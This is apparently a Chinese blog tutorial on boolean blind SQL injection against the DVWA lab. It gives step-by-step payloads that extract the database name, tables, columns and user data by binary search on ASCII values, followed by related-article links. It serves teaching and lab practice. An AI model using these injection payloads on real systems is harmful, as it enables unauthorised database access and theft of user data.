布尔注入:

当我们在注入的过程中输入的语句在页面没有数据返回点,这就需要利用布尔型盲注一步步来猜取想要的数据。(盲注分为布尔盲注和时间盲注)

盲注常用函数:

length()  返回字符串的长度, 可以返回 数据库 表明 列名的 长度

substr()  截取字符串。subster(string, start, length)   字符串, 从第几位截取,截取长度是多少

ascil()  返回ascil码

基于时间盲注:

sleep(n)  将程序挂起一段时间,n为n秒

if(expr1,expr2,expr3)  if判断语句

布尔注入流程:

1.判断是否存在注入,字符型还是数字型。

2.猜解当前数据库长度 

  这个注入过程就相当于 输入者跟数据库进行对话

你问:  1' and length (database())=1 #  ( 这里猜测数据库名称为1个字符)

数据库回答:  missing

继续猜测 1‘and length(database())=4 # 当我们输入到4的时候 数据库返回用户id存在 数据库中 ,那么可得出数据库名称为4位

 猜名称    (二分法逐字猜解)

ascii码值: A到Z的ASCII码是65到90,a到z的ascii码值是97到122

首先,我们用二分法取中间数来猜取数据库名称的第一位字母

1' and ascii(substr(database(),1,1))>97 #

 显示存在,说明数据库的第一个字母是大于或等于97的,

1' and ascii(substr(database(),1,1))<122 #

继续使用二分法测试,发现小于122 

1' and ascii (substr(database(),1,1))<109 #

 测试发现小于109

1' and ascii (substr(database(),1,1))<102 #

 发现小于102继续测试

1' and ascii (substr(database(),1,1))<100 #

 发现报错了,这就说明 数据库名称<=100

1' and ascii (substr(database(),1,1))<=100 #

 数据库的第一位数字的ascii为100   即为d   

剩下三位 只需更改substr 的 第二个参数 即可 获取完整的数据库名称

 

3.猜解表名  (猜解表的数量)

1' and (select count(table_name) from information_schema.tables where table_schema=database())=1 #

1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #

显示存在,说明 这个数据库里有 2个表

(猜解第⼀个表名长度)

1' and length (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 #

显示第一个表名的这个长度不为1. 继续测试

1' and length (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 #

 不为2

.

.

.

1' and length (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #

这里显示猜出第一个表名的为9 

接下来只要更改limit 的参数(1.1) 即可猜解第二张表的长度。

 

猜解第一个表的名字

1' and ascii (substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) >97 #

通过二分法和猜解数据库名称一样,取猜解表名。

最后猜解表名为 guestbook users                              

猜解表的字段名 数量:

1' and (select count(column_name) from information_schema.columns where table_name= 'users')=1 #

1' and (select count(column_name) from information_schema.columns where table_name= 'users')=8 #

猜解第一个字段的长度

方法同猜解表名长度

1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=1 #

猜解第一个字段名

1' and ascii(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1,1))>97 # 显⽰存在

猜解数据 

依然是使用二分法猜解数据

and ascii(substr((select user from dvwa.users limit 0,1),1,1))>96 #

MySQL手注之盲注(布尔)的更多相关文章

  1. MYSQL注入天书之盲注讲解

    Background-2 盲注的讲解 何为盲注?盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面.此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注.从ba ...

  2. SQL注入汇总(手注,盲注,报错注入,宽字节,二次编码,http头部){10.22、23 第二十四 二十五天}

    首先什么是SQL注入: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. SQL注入有什么危害? 危害:数据泄露.脱库 ...

  3. mysql基于“时间”的盲注

    无需页面报错,根据页面响应时间做判断! mysql基于时间的盲注 =================================================================== ...

  4. sqli-labs less8-10(布尔盲注时间盲注)

    less-8 布尔盲注 首先利用?id=1' and 1=1 --+和?id=1' and 1=2 --+确定id的类型为单引号''包裹.然后进行盲注. 盲注思路: 破解当前数据库名: and len ...

  5. SQL注入--显注和盲注中过滤逗号绕过

    SQL注入逗号绕过 1.联合查询显注绕过逗号 在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联 ...

  6. sql注入--bool盲注,时间盲注

    盲注定义: 有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注. 布尔盲注: 布尔盲注只有true跟false,也就是说它根据你的注入信息 ...

  7. sqli-labs lesson5-6 布尔盲注 报错注入 延时注入

    LESSON 5: 典型的布尔盲注. 盲注:sql注入过程中,sql语句的执行结果不回显到前端,这个时候就只能用一些别的方法进行判断或者尝试,这个判断或者尝试就叫做盲注.盲注又分为:1.基于布尔SQL ...

  8. SQL注入----盲注总结

    参考文章:https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247490388&idx=1&sn=c677837d7 ...

  9. SQL盲注测试高级技巧

    写在前面: 这篇文章主要写了一些加快盲注速度的技巧和盲注中比较精巧的语句,虽然注入并不是什么新技术了.但是数据库注入漏洞依然困扰着每一个安全厂商,也鞭策着每一个安全从业者不断前进. 正文: 首先来简单 ...

随机推荐

  1. Improved robustness of reinforcement learning policies upon conversion to spiking neuronal network platforms applied to Atari Breakout game

    郑重声明:原文参见标题,如有侵权,请联系作者,将会撤销发布! arXiv:1903.11012v3 [cs.LG] 19 Aug 2019 Neural Networks, 25 November 2 ...

  2. in文件注意事项及详细解释(转载)

    转载自:https://www.cnblogs.com/sysu/p/10817315.html  和   https://www.cnblogs.com/panscience/p/4953940.h ...

  3. [FJOI2020]染色图的联通性问题 题解

    FJOI2020 D1T2 题目大意 给出一个由 $n$ 个点 $m$ 条边构成的染色无向图,求删去每一个点及与其相连的边后图中不连通的同色点对数量.$n,m\leq 10^5$. 思路分析 可以想到 ...

  4. k8s部署mysql主从复制

    Mysql主从 准备环境 一,准备软件 官方docker_image :Mysql5.7.28 Docker Version:        19.03.4 K8s api-version:      ...

  5. .net core 返回业务错误(不抛异常)

    在开始之前你需要知道: 1.通过抛异常--全局捕获异常的方式返回业务错误信息性能是非常差的(不知道为什么的可以百度一下) 2.如何将错误信息绑定到mvc模型验证中 自定义返回内容 //返回内容接口 p ...

  6. Node中间层浅认知

    Node中间层允许前端来做网站路由.页面渲染.SEO优化,对以往从来不接触这些内容的前端选手来说,正是锻炼我们网站架构的好机会.另外,这也是一次深入了解Node的好机会,准备好迎接即将到来的前端工程化 ...

  7. Unity调试外部DLL

    1.更改DLL的.csproj工程配置文件,在里面添加如下属性:<PropertyGroup Condition=" '$(OS)' == 'Unix' ">     ...

  8. Spring Cloud:Consul基础知识

    一.基本概念 Consul是一套开源的分布式服务发现和配置管理系统,由HashiCorp公司用Go开发. 它提供微服务系统中的服务治理.配置中心.控制总线等功能. 服务发现:提供HTTP和DNS两种发 ...

  9. Arbitrary-Oriented Object Detection with Circular Smooth Label(ECCV2020,旋转目标检测)

    论文链接:https://arxiv.org/abs/2003.05597 code:https://github.com/Thinklab-SJTU/CSL_RetinaNet_Tensorflow ...

  10. rpc之负载均衡

    使用集群,比如zk来控制注册中心,当一个服务有多个请求地址的时候,会返回多个地址. 那么就需要负载均衡来控制我们要请求哪台机器来得到请求. 方案一:随机 传入key值和key所包含的ip地址值,该地址 ...